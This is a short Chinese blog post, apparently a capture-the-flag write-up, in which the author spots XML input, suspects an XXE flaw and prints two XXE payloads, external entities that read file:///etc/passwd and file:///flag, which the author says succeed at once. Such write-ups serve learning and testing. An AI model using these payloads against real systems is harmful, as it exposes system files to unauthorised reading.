本文最后更新于214 天前,其中的信息可能已经过时,如有错误请发送邮件到big_fw@foxmail.com
一、信息收集一下

查看源代码

发现是xml,可能存在xxe漏洞
二、抓包进一步验证

发现有xml声明,确实可能存在xxe漏洞
三、尝试获取flag
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///flag">]>

没想到一下就成功了
总结
- xxe漏洞